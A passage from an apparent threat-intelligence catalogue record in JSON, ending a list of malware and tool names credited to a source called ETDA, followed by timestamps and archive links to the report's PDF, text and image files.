				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434489,
	"ts_updated_at": 1775826694,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/999a215477245a6b91cd3f9263228e9f7018a2a1.pdf",
		"text": "https://archive.orkl.eu/999a215477245a6b91cd3f9263228e9f7018a2a1.txt",
		"img": "https://archive.orkl.eu/999a215477245a6b91cd3f9263228e9f7018a2a1.jpg"
	}
}